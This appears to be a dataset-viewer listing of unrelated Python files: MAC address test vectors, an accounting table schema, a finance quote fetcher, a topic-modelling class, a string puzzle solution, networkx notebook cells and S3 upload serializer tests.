"0a1b.2c3d.4e5f"
),
(
"0A1B.2C3D.4E5F", # Dot notation (uppercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
)
]
NULL_EUI = [
(
"ffffffffffff", # Plain notation (lowercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
),
(
"FFFFFFFFFFFF", # Plain notation (uppercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
),
(
"ff-ff-ff-ff-ff-ff", # Hyphen notation (lowercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
),
(
"FF-FF-FF-FF-FF-FF", # Hyphen notation (uppercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
),
(
"ff:ff:ff:ff:ff:ff", # Colon notation (lowercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
),
(
"FF:FF:FF:FF:FF:FF", # Colon notation (uppercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
),
(
"ffff.ffff.ffff", # Dot notation (lowercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
),
(
"FFFF.FFFF.FFFF", # Dot notation (uppercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
)
]
INVALID_ADDRESS = INVALID_IDENTIFIER
BROADCAST = "ffffffffffff"
MULTICAST = "0180c2000000" # Link-Layer Discovery Protocol
UAA_UNICAST = "a0b1c2d3e4f5"
LAA_UNICAST = "aab1c2d3e4f5"
|
# table definition
table = {
'table_name' : 'ap_terms_codes',
'module_id' : 'ap',
'short_descr' : 'Terms codes',
'long_descr' : 'Terms codes',
'sub_types' : None,
'sub_trans' : None,
'sequence' : ['seq', [], None],
'tree_params' : None,
'roll_params' : None,
'indexes' : None,
'ledger_col' : None,
'defn_company' : None,
'data_company' : None,
'read_only' : False,
}
# column definitions
cols = []
cols.append ({
'col_name' : 'row_id',
'data_type' : 'AUTO',
'short_descr': 'Row id',
'long_descr' : 'Row id',
'col_head' : 'Row',
'key_field' : 'Y',
'data_source': 'gen',
'condition' : None,
'allow_null' : False,
'allow_amend': False,
'max_len' : 0,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : None,
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
cols.append ({
'col_name' : 'created_id',
'data_type' : 'INT',
'short_descr': 'Created id',
'long_descr' : 'Created row id',
'col_head' : 'Created',
'key_field' : 'N',
'data_source': 'gen',
'condition' : None,
'allow_null' : False,
'allow_amend': False,
'max_len' : 0,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : '0',
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
cols.append ({
'col_name' : 'deleted_id',
'data_type' : 'INT',
'short_descr': 'Deleted id',
'long_descr' : 'Deleted row id',
'col_head' : 'Deleted',
'key_field' : 'N',
'data_source': 'gen',
'condition' : None,
'allow_null' : False,
'allow_amend': False,
'max_len' : 0,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : '0',
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
cols.append ({
'col_name' : 'terms_code',
'data_type' : 'TEXT',
'short_descr': 'Terms code',
'long_descr' : 'Terms code',
'col_head' : 'Code',
'key_field' : 'A',
'data_source': 'input',
'condition' : None,
'allow_null' : False,
'allow_amend': False,
'max_len' : 15,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : None,
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
cols.append ({
'col_name' : 'descr',
'data_type' : 'TEXT',
'short_descr': 'Description',
'long_descr' : 'Description',
'col_head' : 'Description',
'key_field' : 'N',
'data_source': 'input',
'condition' : None,
'allow_null' : False,
'allow_amend': True,
'max_len' : 30,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : None,
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
cols.append ({
'col_name' : 'seq',
'data_type' : 'INT',
'short_descr': 'Sequence',
'long_descr' : 'Sequence',
'col_head' : 'Seq',
'key_field' : 'N',
'data_source': 'seq',
'condition' : None,
'allow_null' : False,
'allow_amend': True,
'max_len' : 0,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : None,
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
# discount - [disc perc (dec), terms (int), type(P=periods/D=days/M=calendar day)]
cols.append ({
'col_name' : 'discount_rule',
'data_type' : 'JSON',
'short_descr': 'Discount',
'long_descr' : 'Discount rule',
'col_head' : 'Discount',
'key_field' : 'N',
'data_source': 'input',
'condition' : None,
'allow_null' : False,
'allow_amend': True,
'max_len' : 0,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : None,
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
# due - [instalments (int), terms (int), type(P=periods/D=days/M=calendar day)]
cols.append ({
'col_name' : 'due_rule',
'data_type' : 'JSON',
'short_descr': 'Payment due',
'long_descr' : 'Payment due rule',
'col_head' : 'Due',
'key_field' : 'N',
'data_source': 'input',
'condition' : None,
'allow_null' : False,
'allow_amend': True,
'max_len' : 0,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : None,
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
# arrears - [interest rate (dec), terms (int), type(P=periods/D=days/M=calendar day)]
cols.append ({
'col_name' : 'arrears_rule',
'data_type' : 'JSON',
'short_descr': 'Arrears',
'long_descr' : 'Arrears rule',
'col_head' : 'Arrears',
'key_field' : 'N',
'data_source': 'input',
'condition' : None,
'allow_null' : False,
'allow_amend': True,
'max_len' : 0,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : None,
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
# virtual column definitions
virt = []
# cursor definitions
cursors = []
cursors.append({
'cursor_name': 'terms_codes',
'title': 'Maintain ap terms codes',
'columns': [
['terms_code', 80, False, False],
['descr', 200, True, False],
],
'filter': [],
'sequence': [['seq', False]],
'formview_name': 'setup_ap_terms_codes',
})
# actions
actions = []
|
# -*- coding: utf-8 -*-
#
# Author: RedSpiderMkV
#
# Created: 20/06/2014
# Copyright: (c) RedSpiderMkV 2014
# Licence: <your licence>
#-------------------------------------------------------------------------------
import urllib2
from HistoricalQuote_Base import HistoricalQuoteBase
class HistoricalQuote(HistoricalQuoteBase):
def __init__(self):
self.url = ('http://www.google.co.uk/finance/historical?'
'q={0}&startdate={1}&enddate={2}&output=csv')
def GetData(self, symbol, sDate, eDate):
startDate = sDate.replace('-','+')
endDate = eDate.replace('-', '+')
try:
url = str.format(self.url, symbol, startDate, endDate)
request = (urllib2.urlopen(url)).read().strip()
except Exception as e:
print(e)
return ""
request = unicode(request, 'utf-8-sig')
return self.FormatList(request)
|
import datetime as dt
from logging import raiseExceptions
import pickle
import hdbscan
import seaborn as sns
import numpy as np
import pandas as pd
import seaborn as sns
from tqdm import tqdm
from loguru import logger
from sentence_transformers import SentenceTransformer
from spacy.lang.en import English
from transformertopic.clusterRepresentators import TextRank
from transformertopic.clusterRepresentators.tfidf import Tfidf
from transformertopic.dimensionReducers import UmapEmbeddings
from transformertopic.utils import generateTextId, scrambleDateColumn, showWordCloudFromScoresDict
Sentencizer = English()
Sentencizer.add_pipe("sentencizer")
class TransformerTopic():
"""
Class representing a BertTopic model.
"""
def __init__(self, dimensionReducer=None, hdbscanMinClusterSize=25, stEmbeddings=None):
"""
hdbscanMinClustersize: hdbscan parameter. Corresponds to minimum size of topic. Higher => fewer topics.
stEmbeddings: embeddings model for SentenceTransformer. See available models at https://huggingface.co/sentence-transformers?sort=downloads
"""
if dimensionReducer is None:
dimensionReducer = UmapEmbeddings()
self.dimensionReducer = dimensionReducer
# MODEL PARAMETERS:
if stEmbeddings is None:
stEmbeddings = "paraphrase-MiniLM-L6-v2"
self.stEmbeddingsModel = stEmbeddings
self.hdbscanMinClusterSize = hdbscanMinClusterSize
self.hdbscanMetric = 'euclidean'
self.hdbscanClusterSelectionMethod = 'eom'
# INPUT DATA
self.nOriginalDocuments = 0
self.df = None
self.clusterRepresentator = None
# GENERATED DATA
self.twoDEmbeddings = None
self.nBatches = 0
self.nTopics = -1
self.runFullCompleted = False
self.clusterRepresentations = None
self.topicSizes = None
self.stEmbeddings = None
self.reducedEmbeddings = None
self.clusters = None
self.topicNames = None
def savePickle(self, filepath):
f = open(filepath, 'wb')
pickle.dump(self.__dict__, f, protocol=4)
f.close()
logger.debug(f"Pickled class to {filepath}")
def loadPickle(self, filepath):
f = open(filepath, 'rb')
tmpdict = pickle.load(f)
f.close()
self.__dict__.update(tmpdict)
logger.debug(f"Loaded class from {filepath}")
def saveCsv(self, filepath):
self.df.to_csv(filepath)
def loadCsv(self, filepath, dateColumn='date', textColumn='text'):
self.df = pd.read_csv(filepath)
self.df.rename(columns={dateColumn: 'date', textColumn: 'text'})
self.df['date'] = pd.to_datetime(self.df['date'])
self.nTopics = 1 + int(self.df['topic'].max())
self.nBatches = int(self.df['batch'].max())
def train(
self,
documentsDataFrame=None,
dateColumn='date',
textColumn='text',
idColumn=None,
copyOtherColumns=False
):
"""
Runs the full clustering procedure - slow.
documentsDataFrame: dataFrame containing documents
idColumn: name of column containing unique id of document
dateColumn: name of column containing date of document
textColumn: name of column containing text of document
"""
logger.debug("train: start")
if documentsDataFrame is not None:
self.nOriginalDocuments = len(documentsDataFrame)
self.df = documentsDataFrame.copy()
self.df = pd.DataFrame(self._getSplitSentencesData(
dataFrame=self.df,
dateColumn=dateColumn,
textColumn=textColumn,
idColumn=idColumn,
copyOtherColumns=copyOtherColumns
))
self.df["date"] = pd.to_datetime(self.df["date"])
self.df['batch'] = 1
self.nBatches = 1
elif self.df is None:
raise(
Exception("Either pass documentsDataFrame or self.df should not be None"))
texts = list(self.df["text"])
# textIds = list(self.df["id"])
if self.stEmbeddings is None:
logger.debug(
f"train: computing SentenceTransformer embeddings for {self.stEmbeddingsModel}")
self.stModel = SentenceTransformer(self.stEmbeddingsModel)
self.stEmbeddings = {}
self.stEmbeddings[1] = self.stModel.encode(
texts, show_progress_bar=False)
if self.reducedEmbeddings is None:
self.reducedEmbeddings = {}
self.reducedEmbeddings[1] = self.dimensionReducer.fit_transform(
self.stEmbeddings[1])
if self.clusters is None:
logger.debug(
f"train: computing HDBSCAN with min_cluster_size = {self.hdbscanMinClusterSize}, metric = {self.hdbscanMetric}, cluster_selection_method = {self.hdbscanClusterSelectionMethod}"
)
self.clusterer = hdbscan.HDBSCAN(min_cluster_size=self.hdbscanMinClusterSize,
metric=self.hdbscanMetric,
cluster_selection_method=self.hdbscanClusterSelectionMethod,
prediction_data=True)
self.clusters = {}
self.clusters[1] = self.clusterer.fit(self.reducedEmbeddings[1])
# self.documentIdsToTopics = {}
# self.topicsToDocumentIds = {k: set() for k in self.clusters[1].labels_}
for doubleIdx, label in np.ndenumerate(self.clusters[1].labels_):
idx = doubleIdx[0]
# tId = textIds[idx]
# self.documentIdsToTopics[tId] = label
# self.topicsToDocumentIds[label].add(tId)
self.df.at[idx, "topic"] = int(label)
self.nTopics = self.clusters[1].labels_.max() + 1
self.runFullCompleted = True
logger.debug("train: completed")
def _getSplitSentencesData(self,
dataFrame,
dateColumn,
textColumn,
idColumn=None,
copyOtherColumns=False):
data = []
for index, row in dataFrame.iterrows():
date = row[dateColumn]
fulltext = row[textColumn]
if idColumn is None:
id = generateTextId(fulltext)
else:
id = row[idColumn]
if type(fulltext) == type(1.0):
continue
sents = Sentencizer(fulltext).sents
for sent in sents:
newRow = {
"id": id,
"date": date,
"text": str(sent)
}
if copyOtherColumns:
for column in set(dataFrame.columns).difference({"id", "date", "text"}):
newRow[column] = row[column]
data.append(newRow)
return data
def getTopicsForDoc(self, documentId):
subdf = self.df.loc[self.df["id"] == documentId]
return list(subdf["topic"])
def infer(self, newDocumentsDataFrame, dateColumn, textColumn, idColumn=None):
"""
Runs HDBSCAN approximate inference on new texts.
The new DataFrame needs to have the same id, text and date columns as the original one.
"""
if not self.runFullCompleted:
raise Exception("No model computed")
tmpDf = pd.DataFrame(self._getSplitSentencesData(
dataFrame=newDocumentsDataFrame,
dateColumn=dateColumn,
textColumn=textColumn,
idColumn=idColumn
))
indexesAlreadyPresent = set(
self.df["id"]).intersection(set(tmpDf["id"]))
tmpDf = tmpDf[~tmpDf["id"].isin(indexesAlreadyPresent)]
batch = self.nBatches + 1
tmpDf['batch'] = batch
texts = list(tmpDf["text"])
textIds = list(tmpDf["id"])
# sentence transformer
logger.debug(
f"infer: computing SentenceTransformer embeddings for {self.stEmbeddingsModel}")
self.stEmbeddings[batch] = self.stModel.encode(
texts, show_progress_bar=False)
self.reducedEmbeddings[batch] = self.dimensionReducer.fit_transform(
self.stEmbeddings[batch])
logger.debug(
f"infer: computing HDBSCAN with min_cluster_size = {self.hdbscanMinClusterSize}, metric = {self.hdbscanMetric}, cluster_selection_method = {self.hdbscanClusterSelectionMethod}"
)
# hdbscan inference
labels, strengths = hdbscan.approximate_predict(
self.clusterer, self.reducedEmbeddings[batch])
# assign topics in tmpDf
for doubleIdx, label in np.ndenumerate(labels):
idx = doubleIdx[0]
tId = textIds[idx]
tmpDf.loc[tmpDf["id"] == tId, "topic"] = int(label)
self.df = self.df.append(tmpDf)
self.nBatches += 1
logger.debug("infer: inference completed")
def _compute2dEmbeddings(self, batch):
if not self.runFullCompleted:
raise Exception("No model computed")
logger.debug("_compute2dEmbeddings: start")
if self.twoDEmbeddings is None:
self.twoDEmbeddings = {}
self.twoDEmbeddings[batch] = self.dimensionReducer.fit_transform2d(
self.stEmbeddings[batch])
logger.debug("_compute2dEmbeddings: completed")
def plotClusters(self, batch=1):
if not self.runFullCompleted:
raise Exception("No model computed")
if self.twoDEmbeddings is None or batch not in self.twoDEmbeddings.keys():
self._compute2dEmbeddings(batch)
logger.debug("plotClusters")
result = pd.DataFrame(self.twoDEmbeddings[batch], columns=['x', 'y'])
result['labels'] = self.clusters[batch].labels_
# Visualize clusters
fig, ax = plt.subplots(figsize=(20, 10))
outliers = result.loc[result.labels == -1, :]
clustered = result.loc[result.labels != -1, :]
plt.scatter(outliers.x, outliers.y, color='#BDBDBD', s=0.05)
plt.scatter(clustered.x, clustered.y,
c=clustered.labels, s=0.05, cmap='hsv_r')
plt.colorbar()
plt.show()
def _computeClusterRepresentations(self,
topics=None,
nKeywords=25,
clusterRepresentator=None,
):
"""
Computes representation of clusters for wordclouds.
"""
if topics is None:
topics = range(self.nTopics)
topicSet = set(topics)
if clusterRepresentator is None and self.clusterRepresentator is None:
self.clusterRepresentator = Tfidf()
if self.clusterRepresentator is None or (clusterRepresentator is not None and clusterRepresentator != self.clusterRepresentator):
self.clusterRepresentator = clusterRepresentator
self.clusterRepresentations = {}
self.topicNames = {}
topicsToCompute = topicSet
else:
assert self.clusterRepresentations is not None
topicsToCompute = topicSet.difference(
set(self.clusterRepresentations.keys()))
firstbatchdf = self.df[self.df['batch'] == 1]
if len(topicsToCompute) == 0:
return
print(
f"Computing cluster representations for topics {topicsToCompute}")
for cluster_idx in tqdm(topicsToCompute):
topicDf = firstbatchdf[firstbatchdf['topic'] == cluster_idx]
documents = list(topicDf["text"])
keywords, scores = self.clusterRepresentator.fit_transform(
documents, nKeywords)
assert len(keywords) == len(scores)
self.clusterRepresentations[cluster_idx] = {
keywords[i]: scores[i] for i in range(len(keywords))}
self.topicNames[cluster_idx] = "_".join(
keywords[:4])+"."+str(cluster_idx)
def showWordclouds(self,
topicsToShow=None,
nWordsToShow=25,
clusterRepresentator=None,
saveToFilepath=None
):
"""
Computes cluster representations and uses them to show wordclouds.
topicsToShow: set with topics indexes to print. If None all topics are chosen.
nWordsToShow: how many words to show for each topic
clusterRepresentator: an instance of a clusterRepresentator
saveToFilepath: save the wordcloud to this filepath
"""
self._computeClusterRepresentations(
topics=topicsToShow,
nKeywords=nWordsToShow,
clusterRepresentator=clusterRepresentator
)
for topicIdx in topicsToShow:
print("Topic %d" % topicIdx)
wordScores = self.clusterRepresentations[topicIdx]
showWordCloudFromScoresDict(
wordScores, max_words=nWordsToShow, filepath=saveToFilepath)
def searchForWordInTopics(self,
word,
topicsToSearch=None,
topNWords=15,
clusterRepresentator=None):
"""
Returns any topic containing 'word' in the topNWords of its cluster representation
word: the word to look for
topicsToSearch: set with topics indexes to search in. If None all topics are searched in.
nWordsToShow: how many words to show for each topic
clusterRepresentator: an instance of a clusterRepresentator
"""
if topicsToSearch is None:
topicsToSearch = set(range(self.nTopics))
self._computeClusterRepresentations(
topics=topicsToSearch,
nKeywords=topNWords,
clusterRepresentator=clusterRepresentator
)
positive_topics = set()
for tidx in topicsToSearch:
if word in self.clusterRepresentations[tidx].keys():
positive_topics.add(tidx)
return positive_topics
def prettyPrintTopics(self, topicsToPrint=None, nWordsToShow=5):
"""
Pretty prints topics.
topicsToPrint: set with topics indexes to print. If None all topics are chosen.
nWordsToShow: how many words to show for each topic
"""
if self.clusterRepresentations is None:
self._computeClusterRepresentations()
if topicsToPrint is None:
topicsToPrint = set(range(self.nTopics))
for topicIdx in topicsToPrint:
print(f"\nTopic {topicIdx}")
representationItems = self.clusterRepresentations[topicIdx].items()
wordFrequencies = sorted(
representationItems, key=lambda x: x[1], reverse=True)
for word, frequency in wordFrequencies[:nWordsToShow]:
print("\n%10s:%2.3f" % (word, frequency))
def showTopicSizes(self,
showTopNTopics=None,
minSize=None,
batches=None):
"""
Show bar chart with topic sizes (n. of documents).
Returns list of topic indexes with more than minSize documents.
showTopNTopics: if integer, show only this number of largest sized topics. If None it is ignored.
minSize: show only topics with bigger size than this. If None ignore
batches: which batches to include. If None include all known documents.
"""
if batches is None:
batches = {k for k in range(1, self.nBatches+1)}
if minSize is None and showTopNTopics is None:
plotIndexIsRange = True
else:
plotIndexIsRange = False
topicIndexes = []
self.topicSizes = []
df = self.df
for k in range(self.nTopics):
# docsK = self.topicsToDocumentIds[k]
docsK = df.loc[(df['batch'].isin(batches)) & (df["topic"] == k)]
ndocs = len(docsK)
if minSize is None or ndocs > minSize:
if plotIndexIsRange:
topicIndexes.append(k)
else:
topicIndexes.append(str(k))
self.topicSizes.append(ndocs)
# logger.debug(f"batches: {batches}, self.topicSizes: {self.topicSizes}")
if showTopNTopics is None:
indexes = topicIndexes
sizes = self.topicSizes
else:
argsort = np.argsort(self.topicSizes)[::-1]
indexes = []
sizes = []
for i in argsort[:showTopNTopics]:
# indexes = topicIndexes[:showTopNTopics]
if plotIndexIsRange:
indexes.append(topicIndexes[i])
else:
indexes.append(str(topicIndexes[i]))
sizes.append(self.topicSizes[i])
# print(f"index: {indexes}, sizes: {sizes}")
# plt.bar(indexes, sizes)
# plt.show()
plot_ = sns.barplot(x=indexes, y=sizes, palette='colorblind')
if len(indexes) > 25:
modulo = len(indexes) // 20
for ind, label in enumerate(plot_.get_xticklabels()):
if ind % modulo == 0: # every 10th label is kept
label.set_visible(True)
else:
label.set_visible(False)
return [int(k) for k in indexes]
def showTopicTrends(self,
topicsToShow=None,
batches=None,
resamplePeriod='6M',
scrambleDates=False,
normalize=False,
fromDate=None,
toDate=None,
saveToFilepath=None,
**plotkwargs
):
"""
Show a time plot of popularity of topics. On the y-axis the count of sentences in that topic is shown. If normalize is set to True, the percentage of sentences in that topic (when considering all the sentences in the whole corpus in that time slot) is shown.
topicsToShow: set with topics indexes to print. If None all topics are chosen.
batches: which batches to include. If None include all known documents.
resamplePeriod: resample to pass to pandas.DataFrame.resample.
normalize: if False count of sentences is shown. If True percentages relative to the whole corpus.
scrambleDates: if True, redistributes dates that are on 1st of the month (year) uniformly in that month (year)
"""
self._computeClusterRepresentations(topics=topicsToShow)
if topicsToShow is None:
topicsToShow = range(self.nTopics)
if batches is None:
batches = {k for k in range(1, self.nBatches+1)}
if(scrambleDates):
df = scrambleDateColumn(self.df, "date")
else:
df = self.df
# we need to build a common index to plot all the resampled time series against
date_range = self.df[self.df['topic'] != -1].set_index('date')
alltimes = date_range.resample(resamplePeriod).count()['id']
df = df[df['batch'].isin(batches)]
resampledDfs = {}
resampledColumns = {}
topicsToResample = topicsToShow if not normalize else list(
range(self.nTopics))
for topicIdx in topicsToResample:
tseries = df.loc[df["topic"] == topicIdx, ["date", "topic"]]
tseries = tseries.set_index("date")
resampled = tseries.resample(resamplePeriod).count().rename(
{"topic": 'count'}, axis=1)['count']
# use the common index
resampled = resampled.reindex(alltimes.index, method='ffill')
resampled.sort_index(inplace=True)
resampledDfs[topicIdx] = resampled.fillna(0)
resampledColumns[topicIdx] = self.topicNames[topicIdx] if topicIdx in self.topicNames else 'Topic %d' % topicIdx
if normalize:
from functools import reduce
totsum = reduce(lambda x, y: x + y, resampledDfs.values())
normalizedDfs = {}
for topicIdx, rs in resampledDfs.items():
normalizedDfs[topicIdx] = (rs/totsum).fillna(0)
resampledDfs = normalizedDfs
# dfToPlot = pd.DataFrame(columns=[resampledColumns[tidx] for tidx in topicsToShow], index=alltimes.index)
dfToPlot = pd.DataFrame(index=alltimes.index)
for topicIdx in topicsToShow:
rsDf = resampledDfs[topicIdx]
column = resampledColumns[topicIdx]
dfToPlot[column] = rsDf
if fromDate is not None:
dfToPlot = dfToPlot.loc[dfToPlot.index > fromDate]
if toDate is not None:
dfToPlot = dfToPlot.loc[dfToPlot.index < toDate]
axis = dfToPlot.interpolate(method='linear').plot(**plotkwargs)
if saveToFilepath is not None:
axis.figure.savefig(saveToFilepath)
return dfToPlot
|
# -*- coding: utf-8 -*-
def main():
from collections import deque
import sys
input = sys.stdin.readline
s = input().rstrip()
t = deque()
r_count = 0
for si in s:
if si == "R":
r_count += 1
else:
if r_count % 2 == 0:
if t and t[-1] == si:
t.pop()
else:
t.append(si)
else:
if t and t[0] == si:
t.popleft()
else:
t.appendleft(si)
ans = list(t)
if r_count % 2 == 1:
ans = reversed(ans)
print("".join(ans))
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
import networkx as nx
import matplotlib.pyplot as plt
# In[ ]:
nx.draw_networkx(nx.lollipop_graph(10, 5))
# In[ ]:
nx.draw_networkx(nx.balanced_tree(2, 3))
# In[ ]:
nx.Graph()
nx.DiGraph()
nx.MultiGraph()
nx.MultiDiGraph()
# In[ ]:
G = nx.Graph()
G.add_node(1)
G.add_node("Hello World")
nx.draw_networkx(G)
# In[ ]:
G = nx.Graph()
G.add_node(1)
G.add_nodes_from([2, 4, 6])
nx.draw_networkx(G)
# In[ ]:
G = nx.Graph()
G.add_nodes_from(nx.path_graph(10))
nx.draw_networkx(G)
# In[ ]:
nx.draw_networkx(nx.path_graph(10))
# In[ ]:
G = nx.Graph()
G.add_edge(1, 2)
G.add_edge(2, 3)
nx.draw_networkx(G)
# In[ ]:
G = nx.Graph()
G.add_edges_from([(1, 2), (1, 3)])
nx.draw_networkx(G)
# In[ ]:
G = nx.Graph()
G.add_edges_from(nx.path_graph(10).edges)
nx.draw_networkx(G)
# In[ ]:
G.clear()
nx.draw_networkx(G)
# In[ ]:
nx.from_pandas_edgelist(df, source="src", target="targ", edge_attr="attr", create_using=nx.DiGraph())
|
import pytest
from s3_file_field._multipart import (
InitializedPart,
InitializedUpload,
PartFinalization,
UploadFinalization,
)
from s3_file_field.views import (
UploadFinalizationRequestSerializer,
UploadInitializationRequestSerializer,
UploadInitializationResponseSerializer,
)
@pytest.fixture
def initialization() -> InitializedUpload:
return InitializedUpload(
object_key='test-object-key',
upload_id='test-upload-id',
parts=[
InitializedPart(
part_number=1,
size=10_000,
upload_url='http://minio.test/test-bucket/1',
),
InitializedPart(
part_number=2,
size=3_500,
upload_url='http://minio.test/test-bucket/2',
),
],
)
def test_upload_request_deserialization():
serializer = UploadInitializationRequestSerializer(
data={
'field_id': 'package.Class.field',
'file_name': 'test-name.jpg',
'file_size': 15,
}
)
assert serializer.is_valid(raise_exception=True)
request = serializer.validated_data
assert isinstance(request, dict)
def test_upload_initialization_serialization(
initialization: InitializedUpload,
):
serializer = UploadInitializationResponseSerializer(initialization)
assert isinstance(serializer.data, dict)
def test_upload_finalization_deserialization():
serializer = UploadFinalizationRequestSerializer(
data={
'field_id': 'package.Class.field',
'object_key': 'test-object-key',
'upload_id': 'test-upload-id',
'parts': [
{'part_number': 1, 'size': 10_000, 'etag': 'test-etag-1'},
{'part_number': 2, 'size': 3_500, 'etag': 'test-etag-2'},
],
}
)
assert serializer.is_valid(raise_exception=True)
finalization = serializer.save()
assert isinstance(finalization, UploadFinalization)
assert all(isinstance(part, PartFinalization) for part in finalization.parts)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.